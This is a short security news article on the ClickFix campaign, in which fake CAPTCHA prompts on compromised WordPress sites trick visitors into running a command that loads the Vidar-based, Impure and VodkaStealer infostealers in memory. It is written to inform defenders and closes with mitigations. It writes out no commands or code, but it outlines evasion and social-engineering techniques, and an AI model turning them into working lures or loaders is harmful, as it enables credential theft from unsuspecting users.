ClickFix Treibt Neue Infostealer-Kampagnen An

The ClickFix framework has evolved from a simple phishing trick into a sophisticated, automated supply‑chain weapon aimed at WordPress installations worldwide. By embedding malicious JavaScript behind a counterfeit Cloudflare CAPTCHA, attackers lure any visitor without an admin cookie into copying a command into a Windows dialog. The command spawns an in‑memory DoubleDonut loader that bypasses traditional file‑based AV, delivering three distinct infostealer payloads. This approach not only masks the infection from site administrators but also leverages the ubiquity of WordPress to reach a broad, unsuspecting audience.

Technically, the campaign deploys three payload families: a new Vidar‑based stealer, the .NET‑written Impure Stealer, and the C++‑based VodkaStealer. Each uses advanced evasion methods such as custom data encoding, symmetric encryption of C2 traffic, and sandbox detection via system‑time checks. The DoubleDonut loader injects the malicious code directly into legitimate Windows processes, ensuring execution stays resident in RAM and avoiding disk footprints. A parallel Microsoft‑tracked variant swaps the classic Win+R run dialog for the Windows Terminal (Win+X), further complicating detection by exploiting newer OS interfaces.

The impact is stark: ESET reports a 517 % year‑over‑year surge in ClickFix activity, and the technique has been adopted by state‑sponsored groups like Lazarus, MuddyWater, and APT28. For WordPress operators, the immediate mitigation steps include restricting admin‑login exposure, enforcing strong credentials, and applying the Rapid7 YARA rules published on GitHub. Longer‑term, organizations should monitor for anomalous CAPTCHA traffic, deploy endpoint behavior analytics to catch memory‑only payloads, and integrate threat‑intel feeds that flag the emerging ClickFix domains. As attackers continue to refine social‑engineering lures, proactive hardening of web assets becomes essential to prevent credential harvesting at scale.